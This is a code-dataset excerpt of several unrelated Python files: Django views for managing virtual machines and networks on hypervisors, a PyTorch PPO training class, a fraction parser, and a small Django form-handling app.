load_balancing.recommended_host(vm, int(vm_disk_size))\n if best_host_ip:\n hypervisorHardware = PhysicalHardwareModel.objects.filter(ipAddress=best_host_ip).first()\n best_host = HypervisorModel.objects.get(hardware=hypervisorHardware)\n vm.hosted_on = best_host\n vm.save()\n else:\n logging.debug(\"[Load Balancing] Load balancing allocation error ... replace with first host\")\n\n else:\n hypervisorHardware = PhysicalHardwareModel.objects.filter(ipAddress=availability_zone).first()\n host_client = HypervisorModel.objects.filter(hardware=hypervisorHardware).first()\n vm.hosted_on = host_client\n vm.save()\n\n # TODO Send command for creating, VM with boot disk\n middlware_server.Enqueue(vm.hostedOn, vm.create())\n middlware_server.Enqueue(vm.hostedOn, vm.hardware_configuration())\n\n if vm_disk_size == '':\n pass\n else: # TODO Check if vm_disk_size is an integer\n cmd_attach_disk_data = vm.attach_disk_data(vm_disk_size + \"GB\")\n middlware_server.Enqueue(vm.hostedOn, vm.hardware.disksUsed.last().create())\n middlware_server.Enqueue(vm.hostedOn, cmd_attach_disk_data)\n\n if vm_auto_start_deploy is not None:\n middlware_server.Enqueue(vm.hostedOn, vm.start_headless())\n else:\n vm.start_after_created = False\n vm.save()\n\n return HttpResponseRedirect('/') # Redirect after POST\n else:\n hosts = HypervisorModel.objects.all()\n return render(request, 'app_bendis/vm_create.html',\n {'deploy_exception': str(deploy_exception),\n 'hosts': hosts, })\n elif request.method == 'GET': \n if request.method == 'GET':\n # TODO To filter only online hosts, now will be put all hosts with down\n hosts = HypervisorModel.objects.filter(status='running')\n\n return render(request, 'app_bendis/vm_create.html', {'hosts': hosts, 'profile_user': userProfile, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /controller_cmd\n#\n@ensure_user_auth\ndef controller_control_vm(request, args):\n if request.user.is_authenticated:\n\n uuid_object = args[:36]\n command = args[36:]\n vm = VirtualMachineModel.objects.get(uuid_internal=uuid_object)\n if vm is not None:\n if vm.hostedOn.status == 'running' or vm.hostedOn.status == 'stop':\n\n if vm.status != 'terminated':\n if command == 'start':\n middlware_server.Enqueue(vm.hostedOn, vm.start_headless())\n vm.status = 'running'\n elif command == 'shutdown':\n middlware_server.Enqueue(vm.hostedOn, vm.power_off())\n vm.status = 'stop'\n elif command == 'restart':\n middlware_server.Enqueue(vm.hostedOn, vm.restart())\n vm.status = 'running'\n elif command == 'terminate':\n if vm.status == 'running':\n middlware_server.Enqueue(vm.hostedOn, vm.power_off())\n middlware_server.Enqueue(vm.hostedOn, vm.destroy())\n vm.status = 'terminated'\n else:\n debug = 'Error controller_cmd'\n else:\n debug = 'virtual machine already terminated'\n vms = VirtualMachineModel.objects.filter(owner=request.user)\n return render(request, 'app_bendis/vm_list.html', {'debug': debug, 'vms': vms, })\n else:\n debug = 'host where vm are located is shutdown or disconnected'\n vms = VirtualMachineModel.objects.filter(owner=request.user)\n return render(request, 'app_bendis/vm_list.html', {'debug': debug, 'vms': vms, })\n\n vm.save()\n return HttpResponseRedirect('/')\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /storage\n#\n@ensure_user_auth\ndef controller_storage(request):\n def get_views_disks():\n disks_view = []\n for vm in VirtualMachineModel.objects.all():\n for disk in vm.hardware.disksUsed.all():\n disk_view_elem = DiskView(vm_hosted_on=vm, disk=disk)\n disks_view.append(disk_view_elem)\n return disks_view\n\n if request.user.is_authenticated:\n debug = ''\n disks_view = get_views_disks()\n\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'debug': debug, 'disks_view': disks_view, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n# URL: /create_storage\n#\n@ensure_user_auth\ndef controller_create_storage(request, vm_name):\n def get_views_disks():\n disks_view = []\n for vm in VirtualMachineModel.objects.all():\n for disk in vm.hardware.disksUsed.all():\n disk_view_elem = DiskView(vm_hosted_on=vm, disk=disk)\n disks_view.append(disk_view_elem)\n return disks_view\n \n if request.user.is_authenticated:\n if request.method == 'POST':\n vm_disk_size = request.POST.get('vm_disk_size', None)\n if vm_disk_size:\n try:\n disk_size = int(vm_disk_size)\n except:\n deploy_exception = \"disk size have to be an integer\"\n disks_view = get_views_disks()\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'deploy_exception': deploy_exception,\n 'disks_view': disks_view, })\n\n vm = VirtualMachineModel.objects.filter(name=vm_name).first()\n\n if vm:\n if vm.status == 'stop':\n cmd_attach_disk_data = vm.attach_disk_data(str(disk_size) + \"GB\")\n middlware_server.Enqueue(vm.hostedOn, vm.hardware.disksUsed.last().create())\n middlware_server.Enqueue(vm.hostedOn, cmd_attach_disk_data)\n else:\n deploy_exception = \"vm stopped\"\n disks_view = get_views_disks()\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'deploy_exception': deploy_exception,\n 'vm_name': vm_name,\n 'disks_view': disks_view, })\n else:\n deploy_exception = \"vm not selected or is not found\"\n disks_view = get_views_disks()\n\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'deploy_exception': deploy_exception,\n 'vm_name': vm_name,\n 'disks_view': disks_view, })\n disks_view = get_views_disks()\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'disks_view': disks_view, })\n else:\n deploy_exception = \"not select disk size\"\n disks_view = get_views_disks()\n return render(request, 'app_bendis/vm_storage_disks_list.html', {'deploy_exception': deploy_exception,\n 'disks_view': disks_view, })\n\n else:\n return render(request, 'app_bendis/vm_storage_disk_create.html', {'vm_name': vm_name})\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n# URL: /network\n#\n@ensure_user_auth\ndef controller_vnat_network(request):\n if request.user.is_authenticated:\n debug = ''\n natNetworks = NatNetworkModel.objects.all()\n obj_return = []\n for natNetwork in natNetworks:\n vms = VirtualMachineModel.objects.filter(natNetworks__in=[natNetwork])\n obj_return.append({'natNetwork': natNetwork,\n 'virtualMachines': vms})\n return render(request, 'app_bendis/vm_vnet_network_list.html', {'debug': debug, 'natNetworks': natNetworks,\n 'obj_return': obj_return, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /port_forword\n#\n@ensure_user_auth\ndef controller_create_vnat_network(request):\n if request.user.is_authenticated:\n\n if request.method == 'POST':\n vnet_name = request.POST.get('vnet_name', None)\n vnet_subnet = request.POST.get('vnet_subnet', None)\n vnet_lower_ip = request.POST.get('vnet_lower_ip', None)\n vnet_upper_ip = request.POST.get('vnet_upper_ip', None)\n vnet_netmask = request.POST.get('vnet_netmask', None)\n availability_zone = request.POST.get('availability-zone', None)\n dhcp = request.POST.get('dhcp', None)\n vnet_description = request.POST.get('vnet_description', None)\n\n hardwareHypervisor = PhysicalHardwareModel.objects.filter(ipAddress=availability_zone)\n if hardwareHypervisor.first():\n hardwareHypervisor = hardwareHypervisor.first()\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n hypervisor = HypervisorModel.objects.filter(hardware=hardwareHypervisor)\n hypervisor = hypervisor.first()\n vnat = NatNetworkModel(uuid_internal=str(uuid.uuid4()), name=vnet_name, subnet=vnet_subnet, lowerip=vnet_lower_ip, upperip=vnet_upper_ip, hostedOn=hypervisor,\n owner=request.user, dhcp=dhcp, description=vnet_description)\n vnat.save()\n \n middlware_server.Enqueue(hypervisor, vnat.create())\n\n return HttpResponseRedirect('/network')\n elif request.method == 'GET': \n debug = ''\n natNetworks = NatNetworkModel.objects.all()\n hypervisors = HypervisorModel.objects.filter(status='running')\n\n return render(request, 'app_bendis/vm_vnet_network_create.html', {'debug': debug, 'natNetworks': natNetworks, \n 'hypervisors': hypervisors })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n\n# URL: /create_network\n# ADD a vnet to a vm (atache)\n@ensure_user_auth\ndef controller_add_vnet(request, vm_name):\n if request.user.is_authenticated:\n error_msg = ''\n if request.method == 'POST':\n vnet_name = request.POST.get('vnet_name', '') \n natNetwork = NatNetworkModel.objects.filter(name=vnet_name)\n vm = VirtualMachineModel.objects.filter(name=vm_name)\n\n if vm.first():\n vm = vm.first()\n else:\n error_msg = 'No valid VM'\n if natNetwork.first():\n natNetwork = natNetwork.first()\n else:\n error_msg = 'No valid NatNetwork'\n \n if error_msg == '':\n vm.natNetworks.add(natNetwork)\n\n middlware_server.Enqueue(natNetwork.hostedOn, natNetwork.atache_virtual_machine(vm))\n\n return HttpResponseRedirect('/virtual_machines/') # Redirect after POST\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n\n\n# URL: /create_network\n#\n@ensure_user_auth\ndef controller_port_forword(request, vnet_name):\n if request.user.is_authenticated:\n debug = ''\n if request.method == 'POST':\n vnet_rule = request.POST.get('vnet_rule', '')\n\n vnet = NatNetworkModel.objects.filter(name=vnet_name)\n\n if vnet.first():\n vnet = vnet.first()\n middlware_server.Enqueue(vnet.hostedOn, vnet.add_portforward_rule(vnet_rule))\n\n return HttpResponseRedirect('/network/') # Redirect after POST\n\n elif request.method == 'GET':\n natNetworks = NatNetworkModel.objects.all()\n return render(request, 'app_bendis/vm_vnet_port_forword_create.html', {'debug': debug, 'vnet_name': vnet_name, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n\n# URL: /handler404\n#\ndef controller_handler404(request):\n response = render_to_response('shared/404_not_found.html', context_instance=RequestContext(request))\n response.status_code = 400\n return response\n\n\n# URL: /handler500\n#\ndef controller_handler500(request):\n response = render_to_response('shared/500_internal_error.html', context_instance=RequestContext(request))\n response.status_code = 500\n return response\n\n\n","sub_path":"apps/app_bendis/views/views_virtual_resource.py","file_name":"views_virtual_resource.py","file_ext":"py","file_size_in_byte":19228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"411327620","text":"import logging\nimport os\n\nimport numpy\nimport torch\n\nimport machine\nfrom machine.util import DictList, ReasonLabeler\nfrom machine.models import PolicyMapping, SigmoidTermination\nfrom machine.util.callbacks import EpisodeLogger\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass ReinforcementTrainer(object):\n \"\"\"\n The ReinforcementTrainer class helps in setting up a training framework for\n reinforcement learning.\n\n Largely inspired by babyAI repo code for PPOAlgo\n \"\"\"\n\n def __init__(self, envs, opt, model, model_name, obs, reshape_reward, algo_name='ppo', reasoning=False):\n self._trainer = f\"Reinforcement Trainer - algorithm: {algo_name}\"\n self._algo = algo_name\n self.env = envs\n self.preprocess_obss = obs\n self.reshape_reward = reshape_reward\n self.logger = logging.getLogger(__name__)\n self.model_path = os.path.join(opt.output_dir, model_name)\n if not os.path.exists(self.model_path):\n self.logger.info(f\"Created model path: {self.model_path}\")\n os.mkdir(self.model_path)\n\n # Copy command-line arguments to class\n self.frames = opt.frames\n self.frames_per_proc = opt.frames_per_proc\n self.num_procs = opt.num_processes\n self.discount = opt.gamma\n self.lr = opt.lr\n self.gae_lambda = opt.gae_lambda\n self.recurrence = opt.recurrence\n self.batch_size = opt.batch_size\n assert opt.batch_size % opt.recurrence == 0\n\n self.clip_eps = opt.clip_eps\n self.entropy_coef = opt.entropy_coef\n self.value_loss_coef = opt.value_loss_coef\n self.max_grad_norm = opt.max_grad_norm\n\n self.num_frames = self.frames_per_proc * self.num_procs\n assert self.frames_per_proc % opt.recurrence == 0\n\n # Arguments for disruptiveness\n self.explore_for = opt.explore_for\n self.disrupt_mode = opt.disrupt\n self.disrupt_coef = opt.disrupt_coef\n\n # Arguments for reasoning\n self.reasoning = reasoning\n if self.reasoning:\n self.delay_reason = opt.delay_reason\n self.sparse_reason = opt.sparse_diag\n self.reason_coef = opt.reason_coef\n self.reason_criterion = torch.nn.CrossEntropyLoss()\n if \"GoToObjThrees\" in opt.env_name:\n self.num_subtasks = 3\n else:\n self.num_subtasks = 2\n\n if \"GoTo\" in opt.env_name:\n replace_instruction = r\"go to (the|a)\"\n elif \"Pickup\" in opt.env_name:\n replace_instruction = r\"pick up (the|a)\"\n if \"Transfer\" in opt.env_name:\n transfer_type = int(opt.env_name.split(\"-\")[1][-1])\n else:\n transfer_type = None\n self.reason_labeler = ReasonLabeler(self.num_procs, self.num_subtasks, tt=transfer_type, replace_instr=replace_instruction)\n\n\n # Initialize observations\n self.obs, self.obs_info = self.env.reset()\n self.obss = [None] * self.frames_per_proc\n\n # Initialize log variables\n self.init_log_vars()\n\n # Initialize callbacks\n self.callback = EpisodeLogger(\n opt.print_every, opt.save_every, model_name, opt.tb, opt.explore_for, opt.reasoning)\n self.callback.set_trainer(self)\n\n # Set parameters for specific algorithms\n if algo_name == 'ppo':\n self.epochs = opt.ppo_epochs\n self.model = model\n self.model.train()\n self.optimizer = torch.optim.Adam(self.model.parameters(\n ), self.lr, (opt.beta1, opt.beta2), eps=opt.optim_eps)\n else:\n raise ValueError(\"Not a valid implemented RL algorithm!\")\n\n # Initialize experience matrices\n self.init_experience_matrices()\n\n self.logger.info(\n f\"Setup {self._trainer}, with model_name: {model_name}\")\n\n def collect_experiences(self, intrinsic_reward=False):\n \"\"\"\n Collect actions, observations and rewards over multiple concurrent\n environments.\n\n Taken from babyAI repo\n\n Args:\n intrinsic_reward (bool): Whether to use intrinsic motivation, in\n the form of the disruptiveness metric. If False, get reward\n from the environment and compute advantage.\n \"\"\"\n for i in range(self.frames_per_proc):\n # Do one agent-environment interaction\n preprocessed_obs = self.preprocess_obss(self.obs, device=device)\n with torch.no_grad():\n model_results = self.model(\n preprocessed_obs, self.memory * self.mask.unsqueeze(1))\n dist = model_results['dist']\n value = model_results['value']\n memory = model_results['memory']\n\n action = dist.sample()\n\n if self.reasoning and self.callback.cycle > self.delay_reason:\n # Save task status for every frame\n task_status = self.reason_labeler.annotate_status(self.obs, self.obs_info)\n self.task_status = task_status\n\n obs, reward, done, env_info = self.env.step(action.cpu().numpy())\n\n # Update experiences values\n self.update_memory(i, action, value, obs, reward, done)\n self.obs = obs\n self.obs_info = env_info\n self.memory = memory\n self.mask = 1 - \\\n torch.tensor(done, device=device, dtype=torch.float)\n\n # Update log values\n self.update_log_values(i, dist, action, reward, done)\n\n # Add advantage and return to experiences\n if intrinsic_reward:\n self.compute_disruptiveness()\n else:\n self.compute_advantage()\n\n if self.reasoning:\n # Fill in the correct reasons over the observed frames\n self.reasons = self.reason_labeler.compute_reasons(self.status, self.obs)\n\n # Flatten the data correctly, making sure that each episode's data is\n # a continuous chunk.\n exps = self.flatten_data()\n\n # Log some values\n log = self.log_output()\n\n return exps, log\n\n def update_model_parameters(self, exps, logs):\n \"\"\"\n Perform gradient update on the model using the gathered experience.\n\n Taken from babyAI repo\n \"\"\"\n for e_i in range(self.epochs):\n self.callback.on_epoch_begin(e_i)\n\n ask_reason = numpy.random.randint(0,self.recurrence)\n for inds in self._get_batches_starting_indexes():\n batch_logs = self.callback.on_batch_begin(None)\n batch_loss = 0\n\n memory = exps.memory[inds]\n\n for i in range(self.recurrence):\n # Create a sub-batch of experience\n sb = exps[inds + i]\n\n # Compute loss\n model_results = self.model(sb.obs, memory * sb.mask)\n dist = model_results['dist']\n value = model_results['value']\n memory = model_results['memory']\n\n disrupt_val = torch.tensor(1)\n if self.disrupt_mode > 0:\n if i < self.recurrence - 1:\n s1 = sb.obs.image\n s2 = exps[inds + i + 1].obs.image\n disrupt_val = torch.sum(\n s1 != s2, dtype=torch.float)\n disrupt_val = torch.log(disrupt_val)\n disrupt_val = torch.clamp(\n disrupt_val, min=.01, max=10)\n disrupt_val *= self.disrupt_coef\n\n entropy = dist.entropy().mean()\n ratio = torch.exp(dist.log_prob(\n sb.action) - sb.log_prob)\n surr1 = ratio * sb.advantage\n surr2 = torch.clamp(\n ratio, 1.0 - self.clip_eps, 1.0 + self.clip_eps) * sb.advantage\n policy_loss = -torch.min(surr1, surr2).mean()\n\n value_clipped = sb.value + \\\n torch.clamp(value - sb.value, -\n self.clip_eps, self.clip_eps)\n surr1 = (value - sb.returnn).pow(2)\n surr2 = (value_clipped - sb.returnn).pow(2)\n value_loss = torch.max(surr1, surr2).mean()\n\n if self.disrupt_mode == 1:\n loss = (policy_loss * disrupt_val) - self.entropy_coef * \\\n entropy + (self.value_loss_coef * value_loss)\n elif self.disrupt_mode == 2:\n loss = policy_loss - self.entropy_coef * \\\n entropy + (self.value_loss_coef *\n (value_loss * disrupt_val))\n elif self.reasoning and self.callback.cycle > self.delay_reason and ((not self.sparse_reason) or ask_reason == i):\n a = sb.reasons.type(torch.long).to(device)\n zero_mask = (a >= 0).type(torch.long)\n val, idx = model_results['reason'].max(dim=1)\n if torch.sum(zero_mask) > 0:\n correct = torch.sum(a == idx).item()\n summ = torch.sum(zero_mask).item()\n acc = correct / summ\n else:\n acc = 0\n self.log_reason_correct.append(acc)\n rr = model_results['reason'].size()\n zz = zero_mask.repeat(rr[-1], 1).transpose(0,1)\n a1 = model_results['reason'].type(torch.float) * zz.type(torch.float)\n a2 = a * zero_mask\n reason_loss = self.reason_criterion(a1, a2)\n loss = policy_loss - self.entropy_coef * \\\n entropy + (self.value_loss_coef * value_loss) + \\\n self.reason_coef * reason_loss\n else:\n loss = policy_loss - self.entropy_coef * \\\n entropy + (self.value_loss_coef * value_loss)\n\n # Update loss\n batch_loss += loss\n\n # Update batch logging values\n batch_logs['entropy'] += entropy.item()\n batch_logs['value'] += value.mean().item()\n batch_logs['policy_loss'] += policy_loss.item()\n batch_logs['value_loss'] += value_loss.item()\n batch_logs['disrupt'] += disrupt_val.item()\n if self.reasoning and self.callback.cycle > self.delay_reason and ((not self.sparse_reason) or ask_reason == i):\n batch_logs['reason_loss'] += reason_loss.item()\n\n\n # Update memories for next epoch\n if i < self.recurrence - 1:\n exps.memory[inds + i + 1] = memory.detach()\n\n # Update loss\n batch_loss /= self.recurrence\n\n # Update batch logging values\n batch_logs['entropy'] /= self.recurrence\n batch_logs['value'] /= self.recurrence\n batch_logs['policy_loss'] /= self.recurrence\n batch_logs['value_loss'] /= self.recurrence\n batch_logs['disrupt'] /= self.recurrence\n if self.reasoning:\n batch_logs['reason'] /= self.recurrence\n\n # Update actor-critic\n self.optimizer.zero_grad()\n batch_loss.backward()\n grad_norm = sum(p.grad.data.norm(\n 2) ** 2 for p in self.model.parameters() if p.grad is not None) ** 0.5\n torch.nn.utils.clip_grad_norm_(\n self.model.parameters(), self.max_grad_norm)\n self.optimizer.step()\n\n # Update log values\n batch_logs['grad_norm'] = grad_norm.item()\n self.callback.on_batch_end(batch_loss.item(), batch_logs)\n logs = self.callback.on_epoch_end(logs)\n return logs\n\n def train(self):\n \"\"\"\n Perform a series on training steps as configured.\n \"\"\"\n # Start training model\n self.callback.on_train_begin()\n num_frames = 0\n while num_frames < self.frames:\n self.callback.on_cycle_start()\n\n # Create experiences and update the training status\n exps, logs = self.collect_experiences(\n intrinsic_reward=(num_frames < self.explore_for)\n )\n\n # Use experience to update policy\n logs = self.update_model_parameters(exps, logs)\n\n num_frames += logs['num_frames']\n self.callback.on_cycle_end(logs)\n\n self.callback.on_train_end()\n\n def init_experience_matrices(self):\n \"\"\"\n Initialize matrices used in the storing of observations.\n \"\"\"\n shape = (self.frames_per_proc, self.num_procs)\n if self._algo == 'ppo':\n memsize = self.model.memory_size\n self.memory = torch.zeros(shape[1], memsize, device=device)\n self.memories = torch.zeros(*shape, memsize, device=device)\n self.mask = torch.ones(shape[1], device=device)\n self.masks = torch.zeros(*shape, device=device)\n self.actions = torch.zeros(*shape, device=device, dtype=torch.int)\n self.values = torch.zeros(*shape, device=device)\n self.rewards = torch.zeros(*shape, device=device)\n self.advantages = torch.zeros(*shape, device=device)\n self.log_probs = torch.zeros(*shape, device=device)\n\n if self.reasoning:\n self.reason = torch.zeros(shape[1], device=device)\n self.reasons = torch.zeros(*shape, device=device)\n self.status = torch.zeros(*shape, self.num_subtasks, device=device)\n\n def init_log_vars(self):\n \"\"\"\n Initialize the variables used for logging training progress.\n \"\"\"\n self.log_episode_return = torch.zeros(self.num_procs, device=device)\n self.log_episode_reshaped_return = torch.zeros(\n self.num_procs, device=device)\n self.log_episode_num_frames = torch.zeros(\n self.num_procs, device=device)\n\n self.log_done_counter = 0\n self.log_return = [0] * self.num_procs\n self.log_reshaped_return = [0] * self.num_procs\n self.log_num_frames = [0] * self.num_procs\n if self.reasoning:\n self.task_status = torch.as_tensor([[0] * self.num_subtasks] * self.num_procs, dtype=torch.float)\n self.log_reason_correct = [0] * self.num_procs\n\n def update_memory(self, i, action, value, obs, reward, done):\n \"\"\"\n Update the memory matrices based on agent-environment interaction.\n \"\"\"\n self.obss[i] = self.obs\n self.memories[i] = self.memory\n self.masks[i] = self.mask\n self.actions[i] = action\n self.values[i] = value\n if self.reshape_reward is not None:\n self.rewards[i] = torch.tensor([\n self.reshape_reward(obs_, action_, reward_, done_)\n for obs_, action_, reward_, done_ in zip(obs, action, reward, done)\n ], device=device)\n else:\n self.rewards[i] = torch.tensor(reward, device=device)\n\n if self.reasoning:\n self.status[i,:,:] = self.task_status\n\n def update_log_values(self, i, dist, action, reward, done):\n \"\"\"\n Update the logging values used for keeping track of training progress.\n \"\"\"\n self.log_probs[i] = dist.log_prob(action)\n self.log_episode_return += torch.tensor(\n reward, device=device, dtype=torch.float)\n self.log_episode_reshaped_return += self.rewards[i]\n self.log_episode_num_frames += torch.ones(\n self.num_procs, device=device)\n\n for j, done_ in enumerate(done):\n if done_:\n self.log_done_counter += 1\n self.log_return.append(self.log_episode_return[j].item())\n self.log_reshaped_return.append(\n self.log_episode_reshaped_return[j].item())\n self.log_num_frames.append(self.log_episode_num_frames[j].item())\n\n self.log_episode_return *= self.mask\n self.log_episode_reshaped_return *= self.mask\n self.log_episode_num_frames *= self.mask\n\n def compute_advantage(self):\n \"\"\"\n Run the advantage estimation from [1].\n\n A_t = delta_t + (gamma * lambda) delta_(t+1) ...\n with\n delta_t = reward_t + gamma V(s_(t+1)) - V(s_t)\n\n [1]: Mnih et al. (2016) \"Asynchronous methods for deep reinforcement learning\"\n \"\"\"\n preprocessed_obs = self.preprocess_obss(self.obs, device=device)\n with torch.no_grad():\n next_value = self.model(\n preprocessed_obs, self.memory * self.mask.unsqueeze(1))['value']\n\n for i in reversed(range(self.frames_per_proc)):\n next_mask = self.masks[i + 1] if i < self.frames_per_proc - 1 else self.mask\n next_value = self.values[i + 1] if i < self.frames_per_proc - 1 else next_value\n next_advantage = self.advantages[i + 1] if i < self.frames_per_proc - 1 else 0\n\n delta = self.rewards[i] + self.discount * \\\n next_value * next_mask - self.values[i]\n self.advantages[i] = delta + self.discount * \\\n self.gae_lambda * next_advantage * next_mask\n\n def compute_disruptiveness(self):\n \"\"\"\n Compute an intrinsic reward based on the disruptiveness metric.\n \"\"\"\n preprocessed_obs = self.preprocess_obss(self.obs, device=device)\n with torch.no_grad():\n next_value = self.model(\n preprocessed_obs, self.memory * self.mask.unsqueeze(1))['value']\n\n for i in range(self.frames_per_proc):\n s_t = self.obss[i]\n s_t1 = self.obss[i +\n 1] if i < (self.frames_per_proc - 1) else self.obs\n\n # Binary difference\n state_t = torch.Tensor([s['image'] for s in s_t])\n state_t1 = torch.Tensor([s['image'] for s in s_t1])\n val = torch.nonzero(state_t - state_t1).size()[0]\n # Normalize over max change\n self.advantages[i] = val / (7 * 7 * self.num_procs)\n\n def flatten_data(self):\n \"\"\"\n Flatten the memory such that it is a continuous chunk of data. This is\n required by the PyTorch optimization step.\n \"\"\"\n exps = DictList()\n exps.obs = [self.obss[i][j]\n for j in range(self.num_procs)\n for i in range(self.frames_per_proc)]\n # In commments below T is self.frames_per_proc, P is self.num_procs,\n # D is the dimensionality\n # T x P x D -> P x T x D -> (P * T) x D\n exps.memory = self.memories.transpose(\n 0, 1).reshape(-1, *self.memories.shape[2:])\n # T x P -> P x T -> (P * T) x 1\n exps.mask = self.masks.transpose(0, 1).reshape(-1).unsqueeze(1)\n\n # for all tensors below, T x P -> P x T -> P * T\n exps.action = self.actions.transpose(0, 1).reshape(-1)\n exps.value = self.values.transpose(0, 1).reshape(-1)\n exps.reward = self.rewards.transpose(0, 1).reshape(-1)\n exps.advantage = self.advantages.transpose(0, 1).reshape(-1)\n exps.returnn = exps.value + exps.advantage\n exps.log_prob = self.log_probs.transpose(0, 1).reshape(-1)\n\n if self.reasoning:\n exps.reasons = self.reasons.transpose(0, 1).reshape(-1)\n\n # Preprocess experiences\n exps.obs = self.preprocess_obss(exps.obs, device=device)\n return exps\n\n def log_output(self):\n \"\"\"\n Create logging output based on the observed training progress.\n \"\"\"\n keep = max(self.log_done_counter, self.num_procs)\n log = {\n \"return_per_episode\": self.log_return[-keep:],\n \"reshaped_return_per_episode\": self.log_reshaped_return[-keep:],\n \"num_frames_per_episode\": self.log_num_frames[-keep:],\n \"num_frames\": self.num_frames,\n \"episodes_done\": self.log_done_counter,\n }\n\n self.log_done_counter = 0\n self.log_return = self.log_return[-self.num_procs:]\n self.log_reshaped_return = self.log_reshaped_return[-self.num_procs:]\n self.log_num_frames = self.log_num_frames[-self.num_procs:]\n if self.reasoning:\n log['correct_reasons'] = self.log_reason_correct[-keep:]\n self.log_reason_correct = self.log_reason_correct[-self.num_procs:]\n return log\n\n def _get_batches_starting_indexes(self):\n \"\"\"\n Gives, for each batch, the indexes of the observations given to\n the model and the experiences used to compute the loss at first.\n Returns\n -------\n batches_starting_indexes : list of list of int\n the indexes of the experiences to be used at first for each batch\n\n Taken from babyAI repo\n \"\"\"\n\n indexes = numpy.arange(0, self.num_frames, self.recurrence)\n indexes = numpy.random.permutation(indexes)\n\n num_indexes = self.batch_size // self.recurrence\n batches_starting_indexes = [indexes[i:i + num_indexes]\n for i in range(0, len(indexes), num_indexes)]\n\n return batches_starting_indexes","sub_path":"machine/trainer/reinforcement_trainer.py","file_name":"reinforcement_trainer.py","file_ext":"py","file_size_in_byte":21722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"95188141","text":"import re\n\nclass Amount:\n\n def transformDivision(self, teller, noemer):\n # print(\">\"+str(teller)+\"<\")\n # print(\">\"+str(noemer)+\"<\")\n result = round(teller / noemer, 4)\n return result\n\n def readDivision(self, string):\n # result = re.search(\"\\d\\s?\\/\\s?\\d\", string)\n result = re.split(\"\\/\", string)\n if re.match(\"\\s?\\d\\s?\", result[0]) and re.match(\"\\s?\\d\\s?\", result[1]):\n return self.transformDivision(int(result[0]), int(result[1]))\n else:\n print(\"geen breuk!\")\n\n","sub_path":"recipeConverter/Amount.py","file_name":"Amount.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"165150285","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\n\nimport json\nimport requests\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpRequest, HttpResponse\nfrom gy import models\nimport sys\n#reload(sys)\nsys.getdefaultencoding()\n#from .models import *\n# Create your views here.\n\ndef host_post(request):\n# from gy import models \n request.encoding='utf-8'\n #print(request.GET)\n if 'q' in request.GET:\n message = 'post is: ' + request.GET['q']\n #new_records=gyname(gyname_name=q)\n #new_records.save()\n result=type(request.GET['q'])\n result1=request.GET['q']\n models.gy.objects.create(name=result1)\n else:\n message = 'OK'\n return HttpResponse(message)\n\n\ndef index(request):\n return render(request, 'gy/contact.html')\n\n@csrf_exempt\ndef get_mas(request):\n if request.method == \"POST\":\n title = request.POST['title']\n username = request.POST['username']\n phone = request.POST['phone']\n email = request.POST['email']\n models.gy.objects.create(name=username)\n #return render(request, 'gy/table.html', {'title': title, 'username': username, 'phone': phone, 'email': email})\n return render(request, 'gy/contact.html')\n else:\n return HttpResponse('

非法操作!

')\n\n\n\ndef get_id(request,ID):\n name=models.gy.objects.get(id=int(ID))\n return HttpResponse(name.create_time)\n \n\n\ndef tijiao(request):\n if request.method == \"POST\":\n title = request.POST['title']\n username = request.POST['username']\n models.gy.objects.create(name=username)\n else:\n return HttpResponse('

非法操作!

')\n return render(request, 'gy/thanks.html')\n\n\ndef select(request):\n return render(request, 'gy/select.html')\n\ndef select2(request):\n name=models.gy.objects.get(id=4)\n if request.method == \"POST\":\n# title = request.POST['ds_name']\n # username = request.POST['ds_username']\n username = request.POST['select2']\n models.gy.objects.create(name=username)\n else:\n return HttpResponse('

非法操作!

